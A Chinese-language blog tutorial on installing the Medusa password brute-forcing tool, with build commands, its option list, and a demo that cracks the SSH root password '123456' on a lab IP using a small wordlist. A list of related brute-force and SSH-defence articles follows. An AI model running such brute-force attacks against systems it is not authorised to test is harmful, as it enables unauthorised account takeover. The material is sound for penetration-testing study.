目录

前言

安装配置

模拟使用

总结

前言

Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的爆力破解工具。可以同时对多个主机,用户或密码执行强力测试。Medusa和hydra一样,同样属于在线密码破解工具。Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP,PcAnywhere, POP3, PostgreSQL, rexec, RDP、rlogin, rsh, SMBNT,SMTP(AUTH/VRFY),SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC、Generic Wrapper以及Web表单的密码爆破工具。

安装配置

1)了解它的一些功能

官网:http://foofus.net/goons/jmk/medusa/medusa.html

2)去官网下载tar包

3)上传包并解压安装

[root@bogon ~]# yum install lrzsz -y
[root@bogon ~]# yum -y install gcc gcc-c++ openssl-devel libssh2-devel postgresql-devel subversion-devel freerdp-devel   #安装苏需要的依赖官网有说明
[root@bogon ~]# cd medusa-2.2
[root@bogon ~]# ./configure   --enable-debug=yes --enable-module-afp=yes --enable-module-cvs=yes --enable-module-ftp=yes --enable-module-http=yes --enable-module-imap=yes --enable-module-mssql=yes --enable-module-mysql=yes --enable-module-ncp=yes --enable-module-nntp=yes --enable-module-pcanywhere=yes --enable-module-pop3=yes --enable-module-postgres=yes --enable-module-rexec=yes --enable-module-rlogin=yes --enable-module-rsh=yes --enable-module-smbnt=yes --enable-module-smtp=yes --enable-module-smtp-vrfy=yes --enable-module-snmp=yes --enable-module-ssh=yes --enable-module-svn=yes --enable-module-telnet=yes --enable-module-vmauthd=yes --enable-module-vnc=yes --enable-module-wrapper=yes --enable-module-web-form=yes     #加入它的部分模块
[root@bogon ~]# make -j 4
[root@bogon ~]# make install   #安装
[root@bogon ~]# ls /usr/local/lib/medusa/modules    #查看可用的模块

4)美杜莎的参数说明

Medusa [-hhost|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module[OPT]
-h [TEXT]      目标主机名称或者IP地址
-H [FILE]       包含目标主机名称或者IP地址文件
-u [TEXT]      测试的用户名
-U [FILE]       包含测试的用户名文件
-p [TEXT]      测试的密码
-P [FILE]       包含测试的密码文件
-C [FILE]       组合条目文件
-O [FILE]       日志信息文件
-e [n/s/ns]    n代表空密码,s代表为密码与用户名相同
-M [TEXT]      模块执行名称
-m [TEXT]      传递参数到模块
-d                 显示所有的模块名称
-n [NUM]       使用非默认Tcp端口
-s                 启用SSL
-r [NUM]       重试间隔时间,默认为3秒
-t [NUM]       设定线程数量
-T             同时测试的主机总数
-L                 并行化,每个用户使用一个线程
-f                 在任何主机上找到第一个账号/密码后,停止破解
-F                在任何主机上找到第一个有效的用户名/密码后停止审计。
-q                显示模块的使用信息
-v [NUM]      详细级别(0-6)
-w [NUM]     错误调试级别(0-10)
-V                显示版本
-Z [TEXT]      继续扫描上一次

模拟使用

1)创建我们的字典,里面可以存放任何密码

[root@bogon ~]# vi /root/zd.txt
123456789
12345
123456ada
123456
fsfsgs

2)演示(这里我演示单一ip)

[root@bogon ~]# medusa -M ssh -h 192.168.191.129 -u root -P /root/zd.txt
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>ACCOUNT CHECK: [ssh] Host: 192.168.191.129 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456789 (1 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.191.129 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 12345 (2 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.191.129 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456ada (3 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.191.129 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (4 of 5 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.191.129 User: root Password: 123456 [SUCCESS]

总结

可以从我的演示中看出,只要密码库够全,密码被分析出来的几率就会很大,无非就是时间的问题。

深度揭秘暴力破解SSH密码 —— Medusa美杜莎相关推荐

  1. 使用Medusa美杜莎暴力破解SSH密码

    使用Medusa美杜莎暴力破解SSH密码 1.Medusa简介 Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的爆力破解工具.可以同时对多个主机,用户或密码执行强力测试.Medusa和hy ...

  2. Freebsd 下用 sshguard 防止暴力破解 ssh 密码

    2019独角兽企业重金招聘Python工程师标准>>> 在 Freebsd 控制台或用 dmesg -a 查看系统消息的时候会发现类似于下面的大量信息,这是因为有人在尝试暴力破解 S ...

  3. 第八天 02.hydra暴力破解ssh密码以及ftp密码

    hydra暴力破解ssh密码 实验环境: ​ windows7 ,kali 实验步骤: windows进入hydra目录 cd 命令 使用命令爆破SSH hydra -l 用户名 -p 密码字典 ss ...

  4. 密码爆破工具:Medusa(美杜莎)-操作说明hydra-操作说明

    目录 密码爆破工具:Medusa(美杜莎)-操作说明 hydra-操作说明 密码爆破工具:Medusa(美杜莎)-操作说明 科普下: Medusa是支持AFP, CVS, FTP, HTTP, IMA ...

  5. 密码爆破工具:Medusa(美杜莎)-操作说明

    科普下: Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP, PcAnywhere, POP3, Postg ...

  6. hydra海德拉 and Medusa美杜莎简单使用教程

    hydra海德拉使用 hydra -L /home/chenglee/zidian/user.txt -P /home/chenglee/zidian/wordlist.TXT 192.168.137 ...

  7. DenyHosts教程:防暴力破解SSH密码

    背景 此前服务器多次被恶意挖矿,我们通过下面的命令搜索SSH远程登录日志,发现攻击者的IP尝试登录了200多次,即暴力破解了被攻击用户的密码.通过询问该用户得知,设置的密码确实比较简单,为了防止后面被 ...

  8. hydra暴力破解ssh密码

    环境:centos7.0 hydra,是一个非常好用的暴力破解工具,而且名字也很cool. 下面是官网上的介绍: AFP, Cisco AAA, Cisco auth, Cisco enable, C ...

  9. Medusa(美杜莎)和Hydra(九头蛇)快速入门手册:01

    今天主要是初步介绍一些Hydra和Medusa的分析和内容,旨在方便快速入门,这是第一部分Medusa,后面附带一些字典,之所以是写一起,我是觉得这两个都是不错的工具,不应该分开的,在这种思想下就汇总 ...

  10. Medusa(美杜莎)和Hydra(九头蛇)快速入门手册:02

    本文是Medusa和Hydra快速入门手册的第二部分,第一部分的传送门这两篇也是后续爆破篇的一部分,至于字典,放在最后,后续会把祖传的几十G字典准备好 Hydra入门使用手册 vanHauser Th ...

最新文章

  1. jstatd,VisualVM使用和报错解决:Could not create remote object--java.security.AccessControlException
  2. php sql delete 返回值,delete方法
  3. 基于silerlight for embedd 视频播放器的之一的问题
  4. linux下屏幕太靠右了,怎么消除linux下的屏幕偏移现象和调整屏幕刷新率?
  5. JSP response request 中文乱码
  6. 计算机错误符号,解析Excel中常见的错误符号以及解决方法
  7. Tensorflow学习笔记(四)
  8. Bailian3670 计算鞍点(POJ NOI0108-05)【矩阵】
  9. 勒索软件Locky最新传播载体分析——中文版Office危在旦夕
  10. python数学建模可视化,[Python与数学建模-数据处理与可视化]-3数据处理工具Pandas...
  11. 浅谈A*算法如何演变为rrt算法
  12. Excel两列数据怎么找不同
  13. Remote end closed connection without response
  14. 安装配置ELK、安装配置ElasticSearch7.13、安装配置Kibana7.13、安装配置Logstash7.13、ElasticSearch7.13安装中文分词器
  15. Mac ZeroTire 的重启方式
  16. has leaked IntentReceiver ...that was originally registerd here.Are you missing a call to unregister
  17. 苹果蕉文案:水果店苹果蕉推广文案
  18. 853计算机综合基础包括什么,2017年南京农业大学853计算机专业基础综合硕士研究生参考书目...
  19. 如何用java POI在excel中画线_java poi对excel的操作详解
  20. html点击按钮跳出消息框

热门文章

  1. 图片提取文字很神奇?试试三步实现OCR!
  2. 权力的游戏——读《原则2 :应对变化中的世界秩序》(中)
  3. 石油大学个人训练赛(一)补题----问题 D: 卡片
  4. 天地三才阵——【Java三大特征】
  5. 仙人掌 圆方树 || 静态 + 动态 (差动态)
  6. Java设置定时器一种简单方法
  7. 计算机sci四区论文,sci四区发表论文是什么水平
  8. 解决iText 5.0.1生成pdf,加入iTextAsian.jar 出现异常 Font 'STSong-Light' with 'UniGB-UCS2-H'...
  9. rabbitmq-channel断网后没有断开情况记录
  10. DirectX加速不可用、已禁用的解决方法